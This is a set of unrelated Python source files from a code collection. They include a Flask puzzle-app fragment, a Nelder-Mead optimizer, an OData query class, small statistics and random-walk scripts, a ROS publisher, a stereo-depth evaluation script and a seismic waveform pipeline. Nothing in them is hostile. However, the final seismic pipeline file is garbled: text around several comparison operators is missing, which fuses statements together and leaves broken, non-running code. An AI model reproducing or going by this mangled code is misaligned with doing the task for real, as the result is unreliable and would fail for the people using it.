image=puzzle.url\n 
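# session_id is embedded so the page can tag its telemetry posts\n
    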
)\n
application.add_url_rule('/play/<display_hash>', 'play', play)\n\n
# Getting puzzles from the DB to show on the browse page\n
def browse():\n
    sort_type = request.args.get('sort_type', 'date') # date\n
    order = request.args.get('order', '') # asc, desc\n
    puzzles = get_puzzles(sort_type, order)\n\n
    output = []\n
    for puzzle in puzzles:\n
        output.append({\n
            'display_hash': puzzle.display_hash,\n
            'url': puzzle.url,\n
            'title': puzzle.title,\n
        })\n
    return to_json_string(output)\n
application.add_url_rule('/browse', 'browse', browse)\n\n
# Users providing feedback or internal bug reports\n
def feedback():\n
    add_feedback(request.form['data'])\n
    return '', 200\n
application.add_url_rule('/feedback', 'feedback', feedback, methods=['POST'])\n\n
# Firing telemetry\n
def telemetry():\n
    session_id = UUID(request.form['session_id'])\n
    type = request.form['type']\n
    date = None\n
    if 'date' in request.form:\n
        date = datetime.fromtimestamp(int(request.form['date']) / 1000)\n
    add_event(session_id, type, date)\n\n
    return '', 200\n
application.add_url_rule('/telemetry', 'telemetry', telemetry, methods=['POST'])\n\n
# Viewing telemetry\n
def dashboard():\n
    if not request_is_authorized():\n
        return '', 401, {'WWW-Authenticate': 'Basic realm=\"\"'}\n
    rows = get_all_rows()\n
    return render_template('dashboard_template.html', data=rows)\n
application.add_url_rule('/dashboard.html', 'dashboard.html', dashboard)\n\n
if __name__ == '__main__':\n
    extra_files = []\n
    for root, dirs, files in os.walk('.'):\n
        if 'images' in root:\n
            continue\n
        for file in files:\n
            extra_files.append(root + os.sep + file)\n
    application.run(extra_files=extra_files)\n
","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"35972750","text":"import numpy as np\n\n\ndef tf(x):\n    return x[0] ** 2 + x[0] * x[1] + x[1] ** 2 - 6 * x[0] - 9 * x[1]\n\n\ndef test_func(x):\n    return 1.2 * x[0] * x[0] - 2.4 * x[1] - 1.6\n\n\n
def totuple(a):\n
    try:\n
        return tuple(totuple(i) for i in a)\n
    except TypeError:\n
        return a\n\n\n
class NelderMead():\n
    def __init__(self):\n
        pass\n\n
    def minimize(self, f, alpha=1, beta=0.5, gamma=2, max_iterations=100):\n\n
        v1 = np.array([1., 0])\n
        v2 = np.array([0, 0])\n
        v3 = np.array([0, 1.])\n\n
        print(\"f(v1) = \", f(v1))\n
        print(\"f(v2) = \", f(v2))\n
        print(\"f(v3) = \", f(v3))\n\n
        print(\"==============================================================\")\n\n
        for i in range(max_iterations):\n
            print(\"Iteration #\", i)\n
            sdict = {totuple(v1): f(v1), totuple(v2): f(v2), totuple(v3): f(v3)}\n
            points = sorted(sdict.items(), key=lambda item: item[1])\n\n
            best = np.array(points[0][0])\n
            good = np.array(points[1][0])\n
            worst = np.array(points[2][0])\n
            print(f(best), f(good), f(worst))\n
            # reflection\n
            mid = (best + good) / 2\n
            print(mid)\n
            xr = mid + alpha * (mid - worst)\n
            print(xr)\n
            if f(xr) < f(good):\n
                worst = xr\n
            else:\n
                if f(xr) < f(worst):\n
                    worst = xr\n
                c = (worst + mid) / 2\n
                if f(c) < f(worst):\n
                    worst = c\n
            if f(xr) < f(best):\n
                # expansion\n
                xe = mid + gamma * (xr - mid)\n
                if f(xe) < f(xr):\n
                    worst = xe\n
                else:\n
                    worst = xr\n
            if f(xr) > f(good):\n
                # contraction\n
                xc = mid + beta * (worst - mid)\n
                if f(xc) < f(worst):\n
                    worst = xc\n
            v1 = worst\n
            v2 = good\n
            v3 = best\n
            print(v1, v2, v3)\n
            print(\"==============================================================\")\n
        return best\n\n
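# For reference: tf's gradient vanishes where 2*x0 + x1 = 6 and x0 + 2*x1 = 9,\n
# i.e. at (x0, x1) = (1, 4) with tf(1, 4) = -21, so the simplex should settle\n
# near that point.\n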
\nif __name__ == \"__main__\":\n
    n = NelderMead()\n
    point = n.minimize(tf, max_iterations=100)\n
    print(\"RESULT\\n\", point)\n
    print(tf(point))\n
","sub_path":"nmopt.py","file_name":"nmopt.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"117539033","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nQuerying\n========\n\nEntities can be queried from a service's singletons with a QuerySingle object:\n\n
.. code-block:: python\n\n
    query = Service.querySingle(Order)\n\n
Adding selects and other options always creates a new Query object with the\n
given directives:\n\n
.. code-block:: python\n\n
    >>> query.filter(Order.Name == 'Foo')\n
    <Query to Order>\n\n
This makes object chaining possible:\n\n
.. code-block:: python\n\n
    >>> first_order = query.filter(...).filter(...).order_by(...).first()\n\n
The resulting objects can be fetched with :py:func:`~QuerySingle.get`. \n
Network is not accessed until this method is triggered.\n\n
Navigation properties can be loaded in the same request with \n
:py:func:`~QuerySingle.expand`:\n\n
.. code-block:: python\n\n
    >>> querySingle.expand(Order.Shipper, Order.Customer)\n
    >>> order = querySingle.get()\n\n
----\n\n
API\n
---\n
\"\"\"\n\n
try:\n
    # noinspection PyUnresolvedReferences\n
    from urllib.parse import urljoin\n
except ImportError:\n
    # noinspection PyUnresolvedReferences\n
    from urlparse import urljoin\n\n
import odata.exceptions as exc\n\n\n
class QuerySingle(object):\n
    \"\"\"\n
    This class should not be instantiated directly, but from a\n
    :py:class:`~odata.service.ODataService` object.\n
    \"\"\"\n
    def __init__(self, entitycls, connection=None, options=None):\n
        self.entity = entitycls\n
        self.options = options or dict()\n
        self.connection = connection\n\n
    def get(self):\n
        url = self._get_url()\n
        options = self._get_options()\n
        data = self.connection.execute_get(url, options)\n
        return self._create_model(data)\n\n
    def __repr__(self):\n
        return '<QuerySingle to {0}>'.format(self.entity)\n\n
    def __str__(self):\n
        return self.as_string()\n\n
    def _get_url(self):\n
        return self.entity.__odata_single_url__()\n\n
    def _get_options(self):\n
        \"\"\"\n
        Format current query options to a dict that can be passed to requests\n
        :return: Dictionary\n
        \"\"\"\n
        options = dict()\n\n
        _top = self.options.get('$top')\n
        if _top is not None:\n
            options['$top'] = _top\n\n
        _offset = self.options.get('$skip')\n
        if _offset is not None:\n
            options['$skip'] = _offset\n\n
        _select = self.options.get('$select')\n
        if _select:\n
            options['$select'] = ','.join(_select)\n\n
        _filters = self.options.get('$filter')\n
        if _filters:\n
            options['$filter'] = ' and '.join(_filters)\n\n
        _expand = self.options.get('$expand')\n
        if _expand:\n
            options['$expand'] = ','.join(_expand)\n\n
        _order_by = self.options.get('$orderby')\n
        if _order_by:\n
            options['$orderby'] = ','.join(_order_by)\n
        return options\n\n
    def _create_model(self, row):\n
        if len(self.options.get('$select', [])):\n
            return row\n
        else:\n
            e = self.entity.__new__(self.entity, from_data=row)\n
            es = e.__odata__\n
            es.connection = self.connection\n
            return e\n\n
    def _get_or_create_option(self, name):\n
        if name not in self.options:\n
            self.options[name] = []\n
        return self.options[name]\n\n
    def _format_params(self, options):\n
        return '&'.join(['='.join((key, str(value))) for key, value in options.items() if value is not None])\n\n
    def _new_query(self):\n
        \"\"\"\n
        Create copy of this query without mutable values. 
All query builders\n should use this first.\n\n :return: Query instance\n \"\"\"\n o = dict()\n o['$top'] = self.options.get('$top', None)\n o['$skip'] = self.options.get('$skip', None)\n o['$select'] = self.options.get('$select', [])[:]\n o['$filter'] = self.options.get('$filter', [])[:]\n o['$expand'] = self.options.get('$expand', [])[:]\n o['$orderby'] = self.options.get('$orderby', [])[:]\n return QuerySingle(self.entity, options=o, connection=self.connection)\n\n def as_string(self):\n query = self._format_params(self._get_options())\n return urljoin(self._get_url(), '?{0}'.format(query))\n\n # Query builders ###########################################################\n\n def select(self, *values):\n \"\"\"\n Set properties to fetch instead of full Entity objects\n\n :return: Raw JSON values for given properties\n \"\"\"\n q = self._new_query()\n option = q._get_or_create_option('$select')\n for prop in values:\n option.append(prop.name)\n return q\n\n def expand(self, *values):\n \"\"\"\n Set ``$expand`` query parameter\n\n :param values: ``Entity.Property`` instance\n :return: Query instance\n \"\"\"\n q = self._new_query()\n option = q._get_or_create_option('$expand')\n for prop in values:\n option.append(prop.name)\n return q\n","sub_path":"odata/querysingle.py","file_name":"querysingle.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"375238292","text":"import math;\nfrom math import sqrt;\n\ndef getVariance(theMean,count,listSet=[]):\n\ttotal = 0\n\n\tfor nums in listSet:\n\t\tnums = float(nums)\n\t\ttotal += ((nums - theMean)**2)\n\tvariance = total/count\n\tvariance = math.sqrt(variance)\n\tprint(\"The standard deviation of this set is: \", variance);\n\tif variance > theMean:\n\t\tprint(\"This set has a high standard deviation\")\n\telse:\n\t\tprint(\"This set has a low standard deviation\")\n\n\n\n\ndef getMean(total,count):\n\ttheMean = 0;\n\ttheMean = total/count\n\tprint(\"The mean of this set is: \", theMean);\n\treturn theMean;\n\n\ndef addSet(count,listSet=[],):\n\ttotal = 0;\n\tfor x in listSet:\n\t\tx = float(x);\n\t\ttotal += x\n\tthemean = getMean(total, count);\n\tgetVariance(themean,count,listSet)\n\treturn;\n\ndef getInput():\n\tcount = 0;\n\tlistSet=[];\n\tflag = True;\n\n\twhile flag != False:\n\t\tlistSet.append(input(f\"Enter count: {count} of data set: \"));\n\t\tcount +=1;\n\t\tcheck = input(\"Do you have more to add 'y/n':\");\n\t\tif check == 'y':\n\t\t\tflag = True\n\t\telse:\n\t\t\tflag = False\n\t\t\taddSet(count,listSet);\n\t\t\treturn;\n\n\ndef main():\n\tgetInput()\n\treturn;\n\nmain();","sub_path":"randomcodings/standard.py","file_name":"standard.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223739087","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef built_in_walk():\n position = 0\n walk = [position]\n for i in range(100):\n step = 1 if random.randint(0, 1) else -1\n position += step\n walk.append(position)\n f = plt.figure(figsize = (8, 6))\n ax = f.add_subplot(111)\n ax.set_title(\"built-in random walk\")\n ax.plot(walk[:100])\n plt.show()\n\ndef numpy_walk():\n SIZE = 100\n a = np.random.randint(0, 2, SIZE)\n b = np.where(a > 0, 1, -1)\n f = plt.figure(figsize = (8, 6))\n ax = f.add_subplot(111)\n ax.set_title(\"numpy random walk\")\n ax.plot(b.cumsum())\n plt.show()\n\ndef numpy_multiple_walk():\n LIMIT = 
10\n SIZE = 50\n COUNT = 10\n a = np.random.randint(0, 2, [COUNT, SIZE])\n a = np.where(a > 0, 1, -1)\n walks = a.cumsum(1)\n f = plt.figure(figsize = (8, 6))\n ax = f.add_subplot(111)\n max = walks.max();\n min = walks.min();\n title = f\"max: {max}, min: {min}\"\n ax.set_title(title)\n ax.plot(walks.T)\n hits = (np.abs(walks) > LIMIT).any(1)\n #crossing_temp = (np.abs(walks[hits]) >= LIMIT).argmax(1)\n crossing_temp = (np.abs(walks[hits]))\n print(crossing_temp)\n plt.show()\n\n\nif __name__ == \"__main__\":\n #built_in_walk()\n #numpy_walk()\n numpy_multiple_walk()\n","sub_path":"python/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"18365136","text":"#! /usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import Int32\n\nclass Publisher():\n def __init__(self):\n self.pub_ = rospy.Publisher(\"/talk\", Int32, queue_size=1)\n self.msg_ = Int32()\n self.msg_.data = 0\n\n def doWork(self):\n self.pub_.publish(self.msg_)\n self.msg_.data += 1\n\ndef main():\n rospy.init_node(\"simple_pub_iterative_class_node\")\n\n publisher = Publisher()\n\n # 2Hz Rate:\n\n rate = rospy.Rate(2)\n while(not rospy.is_shutdown()):\n publisher.doWork()\n rate.sleep()\n\nif __name__ == \"__main__\":\n\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"basics/rospy/simple_pub_py/src/simple_pub_iterative_class.py","file_name":"simple_pub_iterative_class.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583622508","text":"#Author : Yuan Wang\n#Date : 2018-05-26\n\n#********************************************************************************** \n# \n# Given a sorted array, remove the duplicates in place such that each element appear \n# only once and return the new length.\n# \n# Do not allocate extra space for another array, you must do this in place with constant memory.\n# \n# For example,\n# Given input array A = [1,1,2],\n# \n# Your function should return length = 2, and A is now [1,2].\n# \n#\t \n#**********************************************************************************/\n\n#worked well with less time,accepted by the leetcode.com\ndef removeDuplicatesA(nums):\n\t\"\"\"\n\t:type nums: List[int]\n\t:rtype: int\n\n\t\"\"\"\n\tif not nums:\n\t\treturn 0\n\tk=0 \n\tfor i in range(1,len(nums)): \n\t\tif nums[i] != nums[k]: \n\t\t\tk+=1 \n\t\t\tnums[k] = nums[i] \n\t \n\t#del nums[k+1:len(nums)]\n\n\treturn k+1\n\n#worked well but slow for large array\t\ndef removeDuplicatesB(nums):\n\tfor i in nums:\n\t\trepeat=nums.count(i)\n\t\tif repeat > 1:\n\t\t\tfor j in range(repeat-1):\n\t\t\t\tnums.remove(i)\n\n\treturn len(nums)\n#worked well but slow for large array\t\ndef removeDuplicatesC(nums):\n\tfor i in nums:\n\t\twhile(nums.count(i)>1):\n\t\t\tnums.remove(i)\n\treturn len(nums)\n\nA=[1,1,2,3,3,3,4,4,5]\ncount=removeDuplicatesA(A)\nprint(A[:count])\n","sub_path":"Array/removeDuplicatesFromSortedArray.py","file_name":"removeDuplicatesFromSortedArray.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14953524","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport rospy\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom openpose_ros_msgs.msg import OpenPoseHumanList, OpenPoseHuman, PointWithProb\nfrom sensor_msgs.msg import 
Image, RegionOfInterest\n\nbridge = CvBridge()\nrect = []\n\n\nclass OpenPoseROSTracker():\n\n def __init__(self):\n rospy.init_node('openpose_tracker', anonymous=True)\n\n rospy.Subscriber(\"/openpose_ros/human_list\", OpenPoseHumanList, self.callback)\n rospy.Subscriber(\"/camera/rgb/image_raw\", Image, self.image_callback)\n self.roi_pub = rospy.Publisher(\"/roi\", RegionOfInterest, queue_size=1)\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\n def callback(self, data):\n global rect\n # rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data)\n n_humans = data.num_humans\n h_list = data.human_list\n rospy.loginfo(\"#persons: \" + str(n_humans))\n\n if n_humans > 0:\n points = []\n\n for e in h_list:\n temp = OpenPoseHuman()\n temp = e\n # rospy.loginfo('t= {}'.format(temp))\n # rospy.loginfo('t= {0}'.format(temp.body_key_points_with_prob))\n parts = len(temp.body_key_points_with_prob)\n for i in range(0, parts):\n point = PointWithProb()\n point = temp.body_key_points_with_prob[i]\n if point.prob > 0:\n # rospy.loginfo(\"part: {0}, (x,y): ({1}, {2})\".format(i+1, point.x, point.y))\n points.append((point.x, point.y))\n # rospy.loginfo('###############################')\n # rospy.loginfo('--------------------------')\n points_matrix = np.array(points).reshape((-1, 1, 2)).astype(np.int32)\n # rospy.loginfo('points : {0}'.format(points))\n rect = cv2.boundingRect(points_matrix)\n ROI = RegionOfInterest()\n ROI.x_offset = int(rect[0])\n ROI.y_offset = int(rect[1])\n ROI.width = int(rect[2])\n ROI.height = int(rect[3])\n ROI.do_rectify = True\n self.roi_pub.publish(ROI)\n\n def image_callback(self, data):\n global rect, bridge\n try:\n frame = bridge.imgmsg_to_cv2(data, \"bgr8\")\n if rect is not None:\n cv2.rectangle(frame, (rect[0], rect[1]), (rect[0] + rect[2], rect[1] + rect[3]), (0, 255, 255), 1)\n\n cv2.imshow('Openpose-Tracker', frame)\n cv2.waitKey(1)\n\n except CvBridgeError as e:\n pass\n except Exception as e:\n pass\n\n\nif __name__ == '__main__':\n OpenPoseROSTracker()\n","sub_path":"hri_arvr/scripts/trackers/openpose_tracker.py","file_name":"openpose_tracker.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504771796","text":"from SimpleBreakoutStrategy import SimpleBreakoutStrategy\n\nclass Follower:\n def __init__(self):\n self.simpleBreakoutStrategy=SimpleBreakoutStrategy()\n\n def follow(self, strategy, universe, buyXHigh, sellYLow, startDate, curDate,\n totalAmount, riskPerTrade, riskPerGroup, riskInDirection, riskTotal):\n if strategy=='simple':\n self.simpleBreakoutStrategy.follow(universe, buyXHigh, sellYLow, startDate, curDate,\n totalAmount, riskPerTrade, riskPerGroup, riskInDirection, riskTotal)\n return True\n else:\n print(\"Strategy %s is not implemented\" % strategy)\n return False\n\n\n#main block\nif __name__=='__main__':\n import argparse\n parser=argparse.ArgumentParser()\n parser.add_argument(\"--strategy\", help=\"Supported strategy is simple\", default=\"simple\")\n parser.add_argument(\"--universe\", help=\"Supported universe is fno\", default=\"fno\")\n parser.add_argument(\"--buyxhigh\", help=\"Number of days to breakout for long\", default=20)\n parser.add_argument(\"--sellylow\", help=\"Number of days to breakout for short\", default=10)\n parser.add_argument(\"--startdate\", help=\"The start date for trading\", default=\"2018-06-21\")\n parser.add_argument(\"--curdate\", help=\"The current date for 
trading\", default=\"2018-06-21\")\n parser.add_argument(\"--totalamount\", help=\"Total amount for equity\", default=1000000)\n parser.add_argument(\"--riskpertrade\", help=\"Risk percent per trade\", default=1.0)\n parser.add_argument(\"--riskpergroup\", help=\"Risk percent per group\", default=5.0)\n parser.add_argument(\"--riskindirection\", help=\"Risk percent in any direction\", default=10.0)\n parser.add_argument(\"--risktotal\", help=\"Total risk percent\", default=20.0)\n\n args=parser.parse_args()\n args.buyxhigh=int(args.buyxhigh)\n args.sellylow=int(args.sellylow)\n\n follower=Follower()\n follower.follow(args.strategy, args.universe, args.buyxhigh, args.sellylow, args.startdate,\n args.curdate, args.totalamount, args.riskpertrade, args.riskpergroup,\n args.riskindirection, args.risktotal)","sub_path":"trendfollowing/core/Follower.py","file_name":"Follower.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"457435232","text":"\"\"\"\nAuthor: Isabella Liu 7/19/21\nFeature: Test cascade-stereo model on sim-real dataset\n\"\"\"\n\nimport os\nimport argparse\nimport torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom models.psmnet import PSMNet\nfrom datasets.messytable_test_dataset import get_test_loader\nfrom utils.metrics import compute_err_metric, compute_obj_err\nfrom utils.messytable_dataset_config import cfg\nfrom utils.messytable_util import get_time_string, setup_logger, \\\n depth_error_img, disp_error_img, save_img, save_obj_err_file\nfrom utils.warp_ops import apply_disparity_cu\n\nparser = argparse.ArgumentParser(description='Testing for Cascade-Stereo on messy-table-dataset')\nparser.add_argument('--config-file', type=str, default='./CasStereoNet/configs/local_test_config.yaml',\n metavar='FILE', help='Config files')\nparser.add_argument('--model', type=str, default='', metavar='FILE', help='Path to test model')\nparser.add_argument('--output', type=str, default='./testing_output', help='Path to output folder')\nparser.add_argument('--debug', action='store_true', default=False, help='Debug mode')\nparser.add_argument('--annotate', type=str, default='', help='Annotation to the experiment')\nparser.add_argument('--onreal', action='store_true', default=False, help='Test on real dataset')\nparser.add_argument('--analyze-objects', action='store_true', default=True, help='Analyze on different objects')\nparser.add_argument('--exclude-bg', action='store_true', default=False, help='Exclude background when testing')\nparser.add_argument('--warp-op', action='store_true', default=True, help='whether use warp_op function to get disparity')\nargs = parser.parse_args()\ncfg.merge_from_file(args.config_file)\n\n\ndef test(model, val_loader, logger, log_dir):\n model.eval()\n total_err_metrics = {'epe': 0, 'bad1': 0, 'bad2': 0,\n 'depth_abs_err': 0, 'depth_err2': 0, 'depth_err4': 0, 'depth_err8': 0}\n total_obj_disp_err = np.zeros(cfg.SPLIT.OBJ_NUM)\n total_obj_depth_err = np.zeros(cfg.SPLIT.OBJ_NUM)\n total_obj_count = np.zeros(cfg.SPLIT.OBJ_NUM)\n os.mkdir(os.path.join(log_dir, 'pred_disp'))\n os.mkdir(os.path.join(log_dir, 'gt_disp'))\n os.mkdir(os.path.join(log_dir, 'pred_disp_abs_err_cmap'))\n os.mkdir(os.path.join(log_dir, 'pred_depth'))\n os.mkdir(os.path.join(log_dir, 'gt_depth'))\n os.mkdir(os.path.join(log_dir, 'pred_depth_abs_err_cmap'))\n\n for iteration, data in enumerate(tqdm(val_loader)):\n img_L = data['img_L'].cuda()\n img_R = 
data['img_R'].cuda()\n\n img_disp_l = data['img_disp_l'].cuda()\n img_depth_l = data['img_depth_l'].cuda()\n img_label = data['img_label'].cuda()\n img_focal_length = data['focal_length'].cuda()\n img_baseline = data['baseline'].cuda()\n prefix = data['prefix'][0]\n\n # If using warp_op, computing img_disp_l from img_disp_r\n if args.warp_op:\n img_disp_r = data['img_disp_r'].cuda()\n img_depth_r = data['img_depth_r'].cuda()\n img_disp_l = apply_disparity_cu(img_disp_r, img_disp_r.type(torch.int))\n img_depth_l = apply_disparity_cu(img_depth_r, img_disp_r.type(torch.int)) # [bs, 1, H, W]\n\n # If test on real dataset need to crop input image to (540, 960)\n if args.onreal:\n img_L = F.interpolate(img_L, (540, 960))\n img_R = F.interpolate(img_R, (540, 960))\n\n img_disp_l = F.interpolate(img_disp_l, (540, 960))\n img_depth_l = F.interpolate(img_depth_l, (540, 960))\n img_label = F.interpolate(img_label, (540, 960)).type(torch.int)\n\n # Pad the imput image and depth disp image to 960 * 544\n right_pad = cfg.REAL.PAD_WIDTH - 960\n top_pad = cfg.REAL.PAD_HEIGHT - 540\n img_L = F.pad(img_L, (0, right_pad, top_pad, 0, 0, 0, 0, 0), mode='constant', value=0)\n img_R = F.pad(img_R, (0, right_pad, top_pad, 0, 0, 0, 0, 0), mode='constant', value=0)\n\n if args.exclude_bg:\n # Mask ground pixel to False\n img_ground_mask = (img_depth_l > 0) & (img_depth_l < 1.25)\n mask = (img_disp_l < cfg.ARGS.MAX_DISP) * (img_disp_l > 0) * img_ground_mask\n else:\n mask = (img_disp_l < cfg.ARGS.MAX_DISP) * (img_disp_l > 0)\n mask = mask.type(torch.bool)\n mask.detach_() # [bs, 1, H, W]\n\n ground_mask = torch.logical_not(mask).squeeze(0).squeeze(0).detach().cpu().numpy()\n\n with torch.no_grad():\n outputs = model(img_L, img_R)\n pred_disp = outputs['stage2']['pred'] # [bs, H, W]\n pred_disp = pred_disp.unsqueeze(1) # [bs, 1, H, W]\n pred_disp = pred_disp[:, :, top_pad:, :] # TODO: if right_pad > 0 it needs to be (:-right_pad)\n pred_depth = img_focal_length * img_baseline / pred_disp # pred depth in m\n\n # Get loss metric\n err_metrics = compute_err_metric(img_disp_l, img_depth_l, pred_disp, img_focal_length,\n img_baseline, mask)\n for k in total_err_metrics.keys():\n total_err_metrics[k] += err_metrics[k]\n logger.info(f'Test instance {prefix} - {err_metrics}')\n\n # Get object error\n obj_disp_err, obj_depth_err, obj_count = compute_obj_err(img_disp_l, img_depth_l, pred_disp, img_focal_length,\n img_baseline, img_label, mask, cfg.SPLIT.OBJ_NUM)\n total_obj_disp_err += obj_disp_err\n total_obj_depth_err += obj_depth_err\n total_obj_count += obj_count\n\n # Get disparity image\n pred_disp_np = pred_disp.squeeze(0).squeeze(0).detach().cpu().numpy() # [H, W]\n pred_disp_np[ground_mask] = -1\n\n # Get disparity ground truth image\n gt_disp_np = img_disp_l.squeeze(0).squeeze(0).detach().cpu().numpy()\n gt_disp_np[ground_mask] = -1\n\n # Get disparity error image\n pred_disp_err_np = disp_error_img(pred_disp, img_disp_l, mask)\n\n # Get depth image\n pred_depth_np = pred_depth.squeeze(0).squeeze(0).detach().cpu().numpy() # in m, [H, W]\n # crop depth map to [0.2m, 2m]\n # pred_depth_np[pred_depth_np < 0.2] = -1\n # pred_depth_np[pred_depth_np > 2] = -1\n pred_depth_np[ground_mask] = -1\n\n # Get depth ground truth image\n gt_depth_np = img_depth_l.squeeze(0).squeeze(0).detach().cpu().numpy()\n gt_depth_np[ground_mask] = -1\n\n # Get depth error image\n pred_depth_err_np = depth_error_img(pred_depth * 1000, img_depth_l * 1000, mask)\n\n del pred_disp, pred_depth, outputs, img_L, img_R\n\n # Save images\n 
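# (predicted/GT disparity and depth maps plus their error colormaps, keyed by prefix)\n
        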
save_img(log_dir, prefix, pred_disp_np, gt_disp_np, pred_disp_err_np,\n pred_depth_np, gt_depth_np, pred_depth_err_np)\n\n # Get final error metrics\n for k in total_err_metrics.keys():\n total_err_metrics[k] /= len(val_loader)\n logger.info(f'\\nTest on {len(val_loader)} instances\\n {total_err_metrics}')\n\n # Save object error to csv file\n total_obj_disp_err /= total_obj_count\n total_obj_depth_err /= total_obj_count\n save_obj_err_file(total_obj_disp_err, total_obj_depth_err, log_dir)\n\n logger.info(f'Successfully saved object error to obj_err.txt')\n\n\ndef main():\n # Obtain the dataloader\n val_loader = get_test_loader(cfg.SPLIT.VAL, args.debug, sub=10, isTest=True, onReal=args.onreal)\n\n # Tensorboard and logger\n os.makedirs(args.output, exist_ok=True)\n log_dir = os.path.join(args.output, f'{get_time_string()}_{args.annotate}')\n os.mkdir(log_dir)\n logger = setup_logger(\"CascadeStereo Testing\", distributed_rank=0, save_dir=log_dir)\n logger.info(f'Annotation: {args.annotate}')\n logger.info(f'Input args {args}')\n logger.info(f'Loaded config file \\'{args.config_file}\\'')\n logger.info(f'Running with configs:\\n{cfg}')\n\n # Get the model\n logger.info(f'Loaded the checkpoint: {args.model}')\n model = PSMNet(\n maxdisp=cfg.ARGS.MAX_DISP,\n ndisps=[int(nd) for nd in cfg.ARGS.NDISP],\n disp_interval_pixel=[float(d_i) for d_i in cfg.ARGS.DISP_INTER_R],\n cr_base_chs=[int(ch) for ch in cfg.ARGS.CR_BASE_CHS],\n grad_method=cfg.ARGS.GRAD_METHOD,\n using_ns=cfg.ARGS.USING_NS,\n ns_size=cfg.ARGS.NS_SIZE\n )\n state_dict = torch.load(args.model)\n model.load_state_dict(state_dict['model'])\n model.cuda()\n test(model, val_loader, logger, log_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CasStereoNet/test_on_sim_real.py","file_name":"test_on_sim_real.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"197423760","text":"a=123\na=-178\na=0\na=1.2\na=3.45\na=4.24E10\na=4.24e-10\na=0o177\na=0x8ff\n\na=3\nb=4\na**b\n\nprint(\"=\"*50)\nprint(\"My Program\")\nprint(\"=\"*50)\n\na=\"Life is too short, You need Python\"\nprint(a[3])\nprint(a[4])\n\nprint(a[0:4])\nprint(a[12:17])\n\na=\"20010331Rainy\"\ndate=a[:8]\nweather = a[8:]\nprint(date)\nprint(weather)\nyear=a[:4]\nday=a[4:8]\nprint(\"Year : %s\" %year)\nprint(\"Day : %s\" %weather)\na = \"Pithon\"\na[1] = \"y\"\nprint(a)\n\n\n","sub_path":"src/python/chapter2/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583929493","text":"\"\"\" Data pipeline (CPU version)\n\"\"\"\nimport os\nimport glob\nimport time\nimport numpy as np\nimport multiprocessing as mp\nfrom obspy import read, UTCDateTime\nimport config\n\ncfg = config.Config()\n# i/o paths\nfpha = cfg.fpha_in\n# params\nnum_workers = cfg.num_workers_read\nto_prep = cfg.to_prep\nsamp_rate = cfg.samp_rate\nfreq_band = cfg.freq_band\nwin_data_p = cfg.win_data_p\nwin_data_s = cfg.win_data_s\nwin_temp_p = cfg.win_temp_p\nwin_temp_s = cfg.win_temp_s\nchn_p = cfg.chn_p\nchn_s = cfg.chn_s\nnpts_data_p = int(samp_rate*sum(win_data_p))\nnpts_data_s = int(samp_rate*sum(win_data_s))\nnpts_temp_p = int(samp_rate*sum(win_temp_p))\nnpts_temp_s = int(samp_rate*sum(win_temp_s))\nnum_sta_thres = cfg.num_sta_thres[0] # min sta \n\ndef read_event(fpha, event_root):\n # 1. 
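# slicing is zero-based and end-exclusive: a[0:4] == \"Life\", a[12:17] == \"short\"\n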
read phase file\n print('reading phase file')\n event_list = read_fpha(fpha)\n num_events = len(event_list)\n\n # 2. read event data\n print('reading event waveform')\n t=time.time()\n if num_workers==1:\n for evid, event in enumerate(event_list): \n event_loc, pha_dict_data = read_one_event(event, event_root)\n if evid%100==0: print('read/total events {}/{} | time {:.1f}s'.format(evid, num_events, time.time()-t))\n if len(pha_dict_data)st[0].stats.endtime:\n data_p, temp_p, norm_data_p, norm_temp_p, ttp = [None]*5\n else:\n data_p = st2np(st.slice(tp-win_data_p[0], tp+win_data_p[1]), npts_data_p)[chn_p]\n temp_p = st2np(st.slice(tp-win_temp_p[0], tp+win_temp_p[1]), npts_temp_p)[chn_p]\n norm_data_p = calc_norm(data_p, npts_temp_p)\n norm_temp_p = np.array([sum(tr**2)**0.5 for tr in temp_p])\n ttp = tp - event_loc[0]\n else: data_p, temp_p, norm_data_p, norm_temp_p, ttp = [None]*5\n if ts!=-1:\n if ts+max(win_data_s[1],win_temp_s[1])>st[0].stats.endtime \\\n or ts-max(win_data_s[0],win_temp_s[0])end_time: print('bad data!'); return []\n st = stream.slice(start_time, end_time)\n # resample data\n org_rate = int(st[0].stats.sampling_rate)\n rate = 